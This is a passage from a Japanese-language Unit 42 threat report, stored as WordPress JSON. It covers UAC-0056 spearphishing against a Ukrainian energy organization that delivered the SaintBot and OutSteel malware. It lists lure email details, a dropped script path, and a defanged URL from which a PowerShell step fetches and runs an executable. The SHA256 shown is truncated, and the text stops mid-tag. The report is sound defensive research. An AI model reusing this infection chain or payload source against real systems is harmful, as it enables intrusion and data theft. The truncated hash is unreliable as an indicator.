{"id":122148,"date":"2022-02-28T17:21:19","date_gmt":"2022-03-01T01:21:19","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=122148"},"modified":"2022-02-28T17:55:55","modified_gmt":"2022-03-01T01:55:55","slug":"ukraine-targeted-outsteel-saintbot","status":"publish","type":"post","link":"https:\/\/unit42.paloaltonetworks.com\/ja\/ukraine-targeted-outsteel-saintbot\/","title":{"rendered":"\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u7d44\u7e54\u3092\u72d9\u3046\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306b\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30b9\u30c6\u30a3\u30fc\u30e9\u306eOutSteel\u3084\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u306eSaintBot"},"content":{"rendered":"<h2>\u6982\u8981<\/h2>\n<p>2022\u5e742\u67081\u65e5\u3001Unit 42\u306f\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u3042\u308b\u30a8\u30cd\u30eb\u30ae\u30fc\u95a2\u9023\u7d44\u7e54\u3092\u6a19\u7684\u3068\u3057\u305f\u653b\u6483\u3092\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002CERT-UA\u306f\u3001\u3053\u306e\u653b\u6483\u304cUAC-0056\u3068\u3057\u3066\u8ffd\u8de1\u3055\u308c\u3066\u3044\u308b\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306b<a href=\"https:\/\/cert.gov.ua\/article\/18419\">\u3088\u308b\u3082\u306e\u3067\u3042\u308b\u3068\u516c\u5f0f\u306b\u30a2\u30c8\u30ea\u30d3\u30e5\u30fc\u30c8(\u5e30\u5c5e\u5316)\u3057\u3066<\/a>\u3044\u307e\u3059\u3002\u3053\u306e\u6a19\u7684\u578b\u653b\u6483\u306f\u3001\u540c\u30a8\u30cd\u30eb\u30ae\u30fc\u95a2\u9023\u7d44\u7e54\u306e\u5f93\u696d\u54e1\u306b\u9001\u3089\u308c\u305f\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u30e1\u30fc\u30eb\u3067\u3001\u5f53\u8a72\u5f93\u696d\u54e1\u304c\u72af\u7f6a\u3092\u72af\u3057\u305f\u3053\u3068\u3092\u793a\u5506\u3059\u308b\u30bd\u30fc\u30b7\u30e3\u30eb\u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0\u3092\u30c6\u30fc\u30de\u306b\u3057\u305f\u3082\u306e\u3067\u3057\u305f\u3002\u3053\u306e\u30e1\u30fc\u30eb\u306b\u306f\u3001SaintBot(\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0)\u304a\u3088\u3073OutSteel(\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30b9\u30c6\u30a3\u30fc\u30e9)\u3068\u3057\u3066\u77e5\u3089\u308c\u308b\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u30fb\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u60aa\u8cea\u306aJavaScript\u30d5\u30a1\u30a4\u30eb\u3092\u542b\u3080Word\u6587\u66f8\u304c\u6dfb\u4ed8\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002Unit 42\u306f\u3001\u3053\u306e\u653b\u6483\u304c\u3001\u9045\u304f\u3068\u30822021\u5e743\u6708\u306e\u6642\u70b9\u306b\u306f\u9061\u308b\u5927\u898f\u6a21\u306a\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u4e00\u4f8b\u306b\u904e\u304e\u306a\u3044\u3053\u3068\u3092\u78ba\u8a8d\u3057\u3066\u304a\u308a\u3001\u3053\u306e\u3068\u304d\u306e\u540c\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306f\u30a6\u30af\u30e9\u30a4\u30ca\u5185\u306e\u897f\u5074\u653f\u5e9c\u6a5f\u95a2\u3084\u8907\u6570\u306e\u30a6\u30af\u30e9\u30a4\u30ca\u653f\u5e9c\u7d44\u7e54\u3092\u6a19\u7684\u306b\u3057\u3066\u3044\u305f\u3053\u3068\u3092\u78ba\u8a8d\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>OutSteel\u30c4\u30fc\u30eb\u306f\u30b7\u30f3\u30d7\u30eb\u306a\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30b9\u30c6\u30a3\u30fc\u30e9(\u6587\u66f8\u7a83\u53d6\u30c4\u30fc\u30eb)\u3067\u3059\u3002\u30d5\u30a1\u30a4\u30eb\u306e\u7a2e\u985e\u3092\u3082\u3068\u306b\u6a5f\u5bc6\u6027\u306e\u9ad8\u305d\u3046\u306a\u6587\u66f8\u3092\u691c\u7d22\u3057\u3001\u30ea\u30e2\u30fc\u30c8\u30b5\u30fc\u30d0\u30fc\u306b\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3057\u307e\u3059\u3002OutSteel\u306e\u4f7f\u7528\u306f\u3001\u540c\u8105\u5a01\u653b\u6483\u30b0\u30eb\u30fc\u30d7\u306e\u4e3b\u306a\u76ee\u7684\u304c\u3001\u653f\u5e9c\u7d44\u7e54\u3084\u91cd\u8981\u30a4\u30f3\u30d5\u30e9\u95a2\u9023\u4f01\u696d\u306e\u30c7\u30fc\u30bf\u53ce\u96c6\u306b\u3042\u308b\u3053\u3068\u3092\u793a\u5506\u3057\u3066\u3044\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002SaintBot\u30c4\u30fc\u30eb\u306f\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u3067\u3001\u3053\u308c\u3092\u4f7f\u3063\u3066\u8105\u5a01\u30a2\u30af\u30bf\u30fc\u304c\u611f\u67d3\u30b7\u30b9\u30c6\u30e0\u4e0a\u3067\u8ffd\u52a0\u306e\u30c4\u30fc\u30eb\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u30fb\u5b9f\u884c\u3067\u304d\u308b\u3088\u3046\u306b\u3057\u307e\u3059\u3002\u3053\u308c\u306b\u3088\u308a\u30a2\u30af\u30bf\u30fc\u306f\u30b7\u30b9\u30c6\u30e0\u3078\u306e\u6301\u7d9a\u7684\u30a2\u30af\u30bb\u30b9\u3092\u78ba\u4fdd\u3057\u3064\u3064\u3001\u3067\u304d\u308b\u3053\u3068\u306e\u5e45\u3092\u5e83\u3052\u307e\u3059\u3002<\/p>\n<p>OutSteel\u30da\u30a4\u30ed\u30fc\u30c9\u3001SaintBot\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u6570\u3005\u306e\u653b\u6483\u3067\u5171\u901a\u3057\u3066\u5229\u7528\u3055\u308c\u3066\u3044\u307e\u3059\u304c\u3001\u30b7\u30b9\u30c6\u30e0\u306e\u4fb5\u5bb3\u306b\u306f\u3055\u307e\u3056\u307e\u306a\u30bd\u30fc\u30b7\u30e3\u30eb\u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0\u30c6\u30fc\u30de\u3084\u611f\u67d3\u30c1\u30a7\u30fc\u30f3\u304c\u5229\u7528\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u30a2\u30af\u30bf\u30fc\u306f\u3001\u6642\u4e8b\u554f\u984c\u306a\u3069\u9069\u5207\u306a\u30c6\u30fc\u30de\u3092\u4f7f\u3063\u3066\u53d7\u4fe1\u8005\u306b\u3046\u3063\u304b\u308a\u6587\u66f8\u3092\u958b\u304b\u305b\u305f\u308a\u3001\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3055\u305b\u305f\u308a\u3001\u60aa\u610f\u306e\u3042\u308b\u30b3\u30f3\u30c6\u30f3\u30c4\u3092\u6709\u52b9\u306b\u3055\u305b\u305f\u308a\u3001\u5b9f\u884c\u30d5\u30a1\u30a4\u30eb\u3092\u76f4\u63a5\u5b9f\u884c\u3055\u305b\u305f\u308a\u3059\u308b\u3053\u3068\u3067\u3001\u53d7\u4fe1\u8005\u306e\u30b7\u30b9\u30c6\u30e0\u3092\u4fb5\u5bb3\u3057\u3066\u3044\u307e\u3057\u305f\u30022021\u5e743\u6708\u30684\u6708\u306e\u521d\u671f\u306e\u653b\u6483\u3067\u306f\u6697\u53f7\u901a\u8ca8\u3068\u65b0\u578b\u30b3\u30ed\u30ca\u30a6\u30a4\u30eb\u30b9\u611f\u67d3\u75c7(COVID)\u304c\u30c6\u30fc\u30de\u306b\u4f7f\u7528\u3055\u308c\u30012021\u5e745\u6708\u304b\u30897\u6708\u3001\u3055\u3089\u306b2022\u5e742\u6708\u306e\u653b\u6483\u3067\u306f\u3001\u6cd5\u57f7\u884c\u6a5f\u95a2\u95a2\u9023\u306e\u30c6\u30fc\u30de\u3068\u507d\u306e\u5c65\u6b74\u66f8\u304c\u4f7f\u7528\u3055\u308c\u305f\u69d8\u5b50\u3092\u89b3\u6e2c\u3057\u3066\u3044\u307e\u3059\u3002\u6570\u30ab\u6708\u3064\u3065\u3044\u305f\u653b\u6483\u3067\u6cd5\u57f7\u884c\u6a5f\u95a2\u95a2\u9023\u30c6\u30fc\u30de\u304c\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u3053\u3068\u304b\u3089\u3001\u5f53\u8a72\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306f\u30c8\u30ec\u30f3\u30c9\u306b\u306a\u3063\u3066\u3044\u308b\u30c8\u30d4\u30c3\u30af\u3084\u6642\u4e8b\u554f\u984c\u304c\u306a\u3051\u308c\u3070\u6cd5\u57f7\u884c\u6a5f\u95a2\u95a2\u9023\u306e\u30bd\u30fc\u30b7\u30e3\u30eb\u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0\u30c6\u30fc\u30de\u3092\u597d\u3093\u3067\u4f7f\u7528\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3059\u3002<\/p>\n<p>\u3053\u306e\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u304c\u884c\u3046\u3059\u3079\u3066\u306e\u653b\u6483\u3067\u30e1\u30fc\u30eb\u304c\u653b\u6483\u30d9\u30af\u30c8\u30eb\u3068\u3057\u3066\u4f7f\u7528\u3055\u308c\u308b\u70b9\u306f\u5909\u308f\u3063\u3066\u3044\u307e\u305b\u3093\u3002\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u30e1\u30fc\u30eb\u306f\u5171\u901a\u8981\u7d20\u3067\u3059\u304c\u3001\u305d\u308c\u305e\u308c\u306e\u653b\u6483\u306f\u30b7\u30b9\u30c6\u30e0\u306e\u4fb5\u5bb3\u306b\u82e5\u5e72\u7570\u306a\u308b\u611f\u67d3\u30c1\u30a7\u30fc\u30f3\u3092\u7528\u3044\u307e\u3059\u3002\u305f\u3068\u3048\u3070\u3001\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u30e1\u30fc\u30eb\u5185\u306b\u60aa\u610f\u306e\u3042\u308b\u30b7\u30e7\u30fc\u30c8\u30ab\u30c3\u30c8(LNK)\u3092\u542b\u3080Zip\u30a2\u30fc\u30ab\u30a4\u30d6\u3078\u306e\u30ea\u30f3\u30af\u304c\u542b\u307e\u308c\u308b\u3053\u3068\u3084\u3001PDF\u6587\u66f8\u3001Word\u6587\u66f8\u3001JavaScript\u30d5\u30a1\u30a4\u30eb\u3001\u30b3\u30f3\u30c8\u30ed\u30fc\u30eb\u30d1\u30cd\u30eb\u30d5\u30a1\u30a4\u30eb(CPL)\u306e\u5b9f\u884c\u30d5\u30a1\u30a4\u30eb\u306e\u5f62\u3067\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u304c\u542b\u307e\u308c\u308b\u3053\u3068\u304c\u3042\u308a\u307e\u3059\u3002\u30e1\u30fc\u30eb\u306b\u6dfb\u4ed8\u3055\u308c\u308bWord\u6587\u66f8\u3092\u3068\u3063\u3066\u307f\u3066\u3082\u3001\u60aa\u610f\u306e\u3042\u308b\u30de\u30af\u30ed\u3001\u57cb\u3081\u8fbc\u307fJavaScript\u3001<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-11882\">CVE-2017-11882<\/a>\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306a\u3069\u3001\u3055\u307e\u3056\u307e\u306a\u624b\u6cd5\u3067\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30b7\u30b9\u30c6\u30e0\u306b\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u3053\u3068\u304c\u78ba\u8a8d\u3055\u308c\u3066\u3044\u307e\u3059\u3002CPL\u5b9f\u884c\u30d5\u30a1\u30a4\u30eb\u3092\u9664\u304d\u3001\u307b\u3068\u3093\u3069\u306e\u914d\u5e03\u30e1\u30ab\u30cb\u30ba\u30e0\u3067\u306fPowerShell\u30b9\u30af\u30ea\u30d7\u30c8\u306b\u4f9d\u5b58\u3057\u3066\u304a\u308a\u3001PowerShell\u30b9\u30af\u30ea\u30d7\u30c8\u304c\u30ea\u30e2\u30fc\u30c8\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u30b3\u30fc\u30c9\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u30fb\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<p>\u65e2\u77e5\u306e\u653b\u6483\u306e\u6982\u8981\u3084\u60f3\u5b9a\u3055\u308c\u308b\u8105\u5a01\u306b\u5bfe\u3059\u308b\u9632\u5fa1\u65b9\u6cd5\u306e\u63a8\u5968\u306a\u3069\u3001\u30ed\u30b7\u30a2\u30fb\u30a6\u30af\u30e9\u30a4\u30ca\u5371\u6a5f\u306b\u95a2\u3059\u308b\u3088\u308a\u5305\u62ec\u7684\u306a\u60c5\u5831\u306b\u3064\u3044\u3066\u306f\u3001\u5f0a\u793e\u306e\u30d6\u30ed\u30b0\u300c<a href=\"https:\/\/unit42.paloaltonetworks.jp\/preparing-for-cyber-impact-russia-ukraine-crisis\/\">\u30ed\u30b7\u30a2\u30fb\u30a6\u30af\u30e9\u30a4\u30ca\u5371\u6a5f\u306b\u3068\u3082\u306a\u3046\u30b5\u30a4\u30d0\u30fc\u653b\u6483\u306e\u5f71\u97ff\u3078\u5099\u3048\u3092<\/a>\u300d\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044\u3002<\/p>\n<p>\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u306e\u304a\u5ba2\u69d8\u306f\u3001Cortex XDR\u3001\u6b21\u4e16\u4ee3\u30d5\u30a1\u30a4\u30a2\u30a6\u30a9\u30fc\u30eb\u306eWildFire\u3001Advanced URL Filtering\u3001DNS Security\u306a\u3069\u306e\u88fd\u54c1\u304a\u3088\u3073\u30b5\u30fc\u30d3\u30b9\u3092\u901a\u3058\u3066\u3001\u4e0a\u8a18\u306e\u653b\u6483\u304b\u3089\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<table style=\"width: 101.058%;\">\n<tbody>\n<tr>\n<td style=\"width: 33.002%;\"><span style=\"font-weight: 400;\">Unit 42\u306e\u95a2\u9023\u30c8\u30d4\u30c3\u30af<\/span><\/td>\n<td style=\"width: 245.726%;\"><a href=\"https:\/\/unit42.paloaltonetworks.jp\/preparing-for-cyber-impact-russia-ukraine-crisis\/\"><span style=\"font-weight: 400;\">Russia-Ukraine Crisis Cyber Impact<\/span><\/a><span style=\"font-weight: 400;\">, <\/span><a href=\"https:\/\/unit42.paloaltonetworks.jp\/tag\/phishing-ja\/\"><span style=\"font-weight: 400;\">Phishing<\/span><\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>\u76ee\u6b21<\/h2>\n<p><a href=\"#attack-overview\">\u653b\u6483\u306e\u6982\u8981<\/a><br \/>\n<a href=\"#links-to-prior-attacks\">\u904e\u53bb\u306e\u653b\u6483\u3068\u306e\u95a2\u9023<\/a><br \/>\n<a href=\"#payload-analysis-for-feb-2-attack\">2\u67082\u65e5\u306e\u653b\u6483\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u89e3\u6790<\/a><br \/>\n<a href=\"#initial-loader\">\u521d\u671f\u306e\u30ed\u30fc\u30c0<\/a><br \/>\n<a href=\"#additional-files-associated-with-the-attack\">\u653b\u6483\u306b\u95a2\u9023\u3059\u308b\u8ffd\u52a0\u30d5\u30a1\u30a4\u30eb<\/a><br \/>\n<a href=\"#conclusion\">\u7d50\u8ad6<\/a><br \/>\n<a href=\"#additional-resources\">\u8ffd\u52a0\u30ea\u30bd\u30fc\u30b9<\/a><br \/>\n<a href=\"#indicators-of-compromise\">IoC<\/a><br \/>\n<a href=\"#appendix-a-prior-attacks-associated-with-uac-0056\">\u4ed8\u9332A: UAC-0056\u3068\u95a2\u9023\u3059\u308b\u904e\u53bb\u306e\u653b\u6483<\/a><br \/>\n<a href=\"#march-2021-attacks\">2021\u5e743\u6708\u306e\u653b\u6483<\/a><br \/>\n<a href=\"#april-2021-attacks\">2021\u5e744\u6708\u306e\u653b\u6483<\/a><br \/>\n<a href=\"#may-2021-attacks\">2021\u5e745\u6708\u306e\u653b\u6483<\/a><br \/>\n<a href=\"#june-2021-attacks\">2021\u5e746\u6708\u306e\u653b\u6483<\/a><br \/>\n<a href=\"#july-2021-targeting\">2021\u5e747\u6708\u306e\u6a19\u7684<\/a><\/p>\n<h2><a id=\"attack-overview\"><\/a>\u653b\u6483\u306e\u6982\u8981<\/h2>\n<p>2022\u5e742\u67081\u65e5\u3001Unit 42\u306f\u3001\u8105\u5a01\u30a2\u30af\u30bf\u30fc\u304c\u3001\u3042\u308b\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u30a8\u30cd\u30eb\u30ae\u30fc\u95a2\u9023\u7d44\u7e54\u306e\u500b\u4eba\u306b\u6a19\u7684\u578b\u30e1\u30fc\u30eb\u3092\u9001\u4fe1\u3057\u3066\u3044\u305f\u3053\u3068\u3092\u78ba\u8a8d\u3057\u307e\u3057\u305f\u3002\u305d\u306e\u30e1\u30fc\u30eb\u306f\u6b21\u306e\u3088\u3046\u306a\u30a2\u30c8\u30ea\u30d3\u30e5\u30fc\u30c8(\u5c5e\u6027)\u3092\u3082\u3064\u3082\u306e\u3067\u3057\u305f\u3002<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">\u9001\u4fe1\u8005: mariaparsons10811@gmail[.]com<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">\u4ef6\u540d: \u041f\u043e\u0432\u0456\u0434\u043e\u043c\u043b\u0435\u043d\u043d\u044f \u043f\u0440\u043e \u0432\u0447\u0438\u043d\u0435\u043d\u043d\u044f \u0437\u043b\u043e\u0447\u0438\u043d\u0443 (&lt;\u500b\u4eba\u540d\u7701\u7565&gt;)<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb: \u041f\u043e\u0432\u0456\u0434\u043e\u043c\u043b\u0435\u043d\u043d\u044f \u043f\u0440\u043e \u0432\u0447\u0438\u043d\u0435\u043d\u043d\u044f \u0437\u043b\u043e\u0447\u0438\u043d\u0443 (&lt;\u500b\u4eba\u540d\u7701\u7565&gt;).docx<\/span><\/p>\n<p>\u30e1\u30fc\u30eb\u306e\u4ef6\u540d\u3068\u6dfb\u4ed8\u66f8\u985e\u306e\u30d5\u30a1\u30a4\u30eb\u540d\u3092\u30a6\u30af\u30e9\u30a4\u30ca\u8a9e\u304b\u3089\u7ffb\u8a33\u3059\u308b\u3068\u300c<span style=\"font-family: 'courier new', courier, monospace;\">\u72af\u7f6a\u9042\u884c\u306b\u95a2\u3059\u308b\u5831\u544a\u66f8(&lt;\u500b\u4eba\u540d\u7701\u7565&gt;)<\/span>\u300d\u3068\u306a\u308a\u307e\u3059\u3002\u3053\u306e\u30e1\u30fc\u30eb\u306f\u3001\u5f53\u8a72\u500b\u4eba\u304c\u72af\u7f6a\u884c\u70ba\u306b\u95a2\u4e0e\u3057\u3066\u3044\u308b\u3053\u3068\u3092\u793a\u5506\u3059\u308b\u3082\u306e\u3067\u3001\u6a19\u7684\u3068\u3055\u308c\u305f\u500b\u4eba\u306b\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u3092\u958b\u304b\u305b\u308b\u305f\u3081\u306e\u30a2\u30af\u30bf\u30fc\u306b\u3088\u308b\u30bd\u30fc\u30b7\u30e3\u30eb\u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0\u6d3b\u52d5\u306e\u4e00\u74b0\u3068\u8003\u3048\u3089\u308c\u307e\u3059\u3002\u60aa\u610f\u306e\u3042\u308bWord\u6587\u66f8\u306b\u306f\u3001\u6b21\u306e\u3088\u3046\u306a\u5185\u5bb9\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122075\" aria-describedby=\"caption-attachment-122075\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122076 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-25.png\" alt=\"\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u7d44\u7e54\u306e\u6a19\u7684\u3068\u306a\u3063\u305f\u500b\u4eba\u306b\u9001\u3089\u308c\u305f\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u30e1\u30fc\u30eb\u306b\u6dfb\u4ed8\u3055\u308c\u305f\u60aa\u8cea\u306aWord\u6587\u66f8\u3002\u9ed2\u304f\u5857\u308a\u3064\u3076\u3055\u308c\u3066\u3044\u308b\u3088\u3046\u306b\u898b\u3048\u308b\u7b87\u6240\u306f\u3001\u6a19\u7684\u3068\u306a\u3063\u305f\u500b\u4eba\u304c\u6587\u66f8\u5185\u306e\u30a2\u30a4\u30b3\u30f3\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3088\u3046\u306b\u4ed5\u5411\u3051\u308b\u3079\u304f\u3001\u8105\u5a01\u30a2\u30af\u30bf\u30fc\u304c\u4ed5\u7d44\u3093\u3060\u3082\u306e\u3002\" width=\"900\" height=\"967\" \/><figcaption id=\"caption-attachment-122075\" class=\"wp-caption-text\">\u56f31 \u30a6\u30af\u30e9\u30a4\u30ca\u306e\u7d44\u7e54\u306e\u6a19\u7684\u3068\u306a\u3063\u305f\u500b\u4eba\u306b\u9001\u3089\u308c\u305f\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u30e1\u30fc\u30eb\u306b\u6dfb\u4ed8\u3055\u308c\u305f\u60aa\u8cea\u306aWord\u6587\u66f8\u3002\u9ed2\u304f\u5857\u308a\u3064\u3076\u3055\u308c\u3066\u3044\u308b\u3088\u3046\u306b\u898b\u3048\u308b\u7b87\u6240\u306f\u3001\u6a19\u7684\u3068\u306a\u3063\u305f\u500b\u4eba\u304c\u6587\u66f8\u5185\u306e\u30a2\u30a4\u30b3\u30f3\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3088\u3046\u306b\u4ed5\u5411\u3051\u308b\u3079\u304f\u3001\u8105\u5a01\u30a2\u30af\u30bf\u30fc\u304c\u4ed5\u7d44\u3093\u3060\u3082\u306e\u3002<\/figcaption><\/figure>\n<p>\u6dfb\u4ed8\u6587\u66f8\u306e\u5185\u5bb9\u3082\u914d\u4fe1\u3055\u308c\u305f\u30e1\u30fc\u30eb\u306e\u30c6\u30fc\u30de\u306b\u6cbf\u3046\u3082\u306e\u3067\u3001\u30a6\u30af\u30e9\u30a4\u30ca\u56fd\u5bb6\u8b66\u5bdf\u306e\u72af\u7f6a\u635c\u67fb\u5831\u544a\u66f8\u304c\u4e00\u90e8\u4f0f\u305b\u5b57\u306b\u3055\u308c\u3066\u3044\u308b\u3088\u3046\u306b\u898b\u3048\u307e\u3059\u3002\u3053\u306e\u6587\u66f8\u306f\u53d7\u4fe1\u8005\u304c\u611f\u5606\u7b26\u306e\u3064\u3044\u305f\u30a2\u30a4\u30b3\u30f3\u3092\u30af\u30ea\u30c3\u30af\u3059\u308c\u3070\u3001\u9ed2\u3044\u7dda\u3067\u5857\u308a\u3064\u3076\u3055\u308c\u305f\u30c6\u30ad\u30b9\u30c8\u5185\u5bb9\u304c\u8868\u793a\u3055\u308c\u308b\u3068\u3057\u3066\u3044\u307e\u3059\u3002\u4f0f\u305b\u5b57\u306b\u306a\u3063\u3066\u3044\u308b\u3068\u3055\u308c\u308b\u5404\u30b3\u30f3\u30c6\u30f3\u30c4\u306e\u90e8\u4f4d\u306b\u306f\u30a2\u30a4\u30b3\u30f3\u304c\u3042\u308a\u3001\u3053\u308c\u3089\u3092\u30c0\u30d6\u30eb\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u6587\u66f8\u5185\u306b\u57cb\u3081\u8fbc\u307e\u308c\u305f\u60aa\u610f\u306e\u3042\u308bJavaScript(SHA256: <span style=\"font-family: 'courier new', courier, monospace;\">b258a747202b1e80421f8c841c57438fb0670299f067dfeb2c53ab50ff6d<\/span>)\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002\u53d7\u4fe1\u8005\u304c\u3053\u306e\u30a2\u30a4\u30b3\u30f3\u3092\u30c0\u30d6\u30eb\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001Word\u306f\u4ee5\u4e0b\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u30b7\u30b9\u30c6\u30e0\u306b\u66f8\u304d\u8fbc\u307f\u3001Windows Script Host(wscript)\u3067\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\GSU207@POLICE.GOV.UA - \u041f\u043e\u0432\u0456\u0434\u043e\u043c\u043b\u0435\u043d\u043d\u044f (15).js<\/span><\/p>\n<p>\u3053\u306eJavaScript\u30d5\u30a1\u30a4\u30eb\u306f\u6b21\u306e\u30d7\u30ed\u30bb\u30b9\u3092\u5b9f\u884c\u3057\u3001\u5b9f\u884c\u3055\u308c\u305f\u30d7\u30ed\u30bb\u30b9\u306fPowerShell\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122077\" aria-describedby=\"caption-attachment-122077\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122078 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image.jpeg\" alt=\"PowerShell\u306e\u30ef\u30f3\u30e9\u30a4\u30ca\u30fc\" width=\"900\" height=\"138\" \/><figcaption id=\"caption-attachment-122077\" class=\"wp-caption-text\">\u56f32 PowerShell\u306e\u30ef\u30f3\u30e9\u30a4\u30ca\u30fc<\/figcaption><\/figure>\n<p>\u4e0a\u8a18\u306ePowerShell\u30ef\u30f3\u30e9\u30a4\u30ca\u30fc\u306f\u3001\u4ee5\u4e0b\u306eURL\u304b\u3089\u5b9f\u884c\u30d5\u30a1\u30a4\u30eb\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3001<span style=\"font-family: 'courier new', courier, monospace;\">%PUBLIC%\\GoogleChromeUpdate.exe<\/span>\u00a0\u3068\u3057\u3066\u4fdd\u5b58\u3057\u3066\u304b\u3089\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">hxxps:\/\/cdn.discordapp[.]com\/attachments\/932413459872747544\/938291977735266344\/putty.exe<\/span><\/p>\n<p><a href=\"https:\/\/cert.gov.ua\/article\/18273\">CERT-UA<\/a>\u306b\u3088\u308b\u3068\u3001\u3053\u306ePowerShell\u306e\u30ef\u30f3\u30e9\u30a4\u30ca\u30fc\u306f\u3001\u6570\u65e5\u524d\u306e1\u670831\u65e5\u306b\u767a\u751f\u3057\u305f\u3001\u540c\u30b0\u30eb\u30fc\u30d7\u306b\u5e30\u5c5e\u3055\u308c\u308b\u5225\u306e\u653b\u6483\u306b\u3082\u767b\u5834\u3057\u305f\u3088\u3046\u3067\u3059\u3002<\/p>\n<p>\u3053\u306e\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u8a66\u884c\u304c\u3082\u305f\u3089\u3057\u305f<a href=\"#payload-analysis-for-feb-2-attack\">\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u5206\u6790<\/a>(SaintBot\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u3068OutSteel\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30b9\u30c6\u30a3\u30fc\u30e9\u304c\u542b\u307e\u308c\u3066\u3044\u305f)\u306b\u3082\u3068\u3065\u304f\u3068\u3001\u540c\u653b\u6483\u306b\u304a\u3051\u308b\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306e\u76ee\u6a19\u306f\u5f53\u8a72\u30a8\u30cd\u30eb\u30ae\u30fc\u7d44\u7e54\u304b\u3089\u306e\u30c7\u30fc\u30bf\u6f0f\u51fa\u306b\u95a2\u9023\u3059\u308b\u3082\u306e\u3067\u3042\u3063\u305f\u3068\u63a8\u6e2c\u3055\u308c\u307e\u3059\u3002<\/p>\n<h2><a 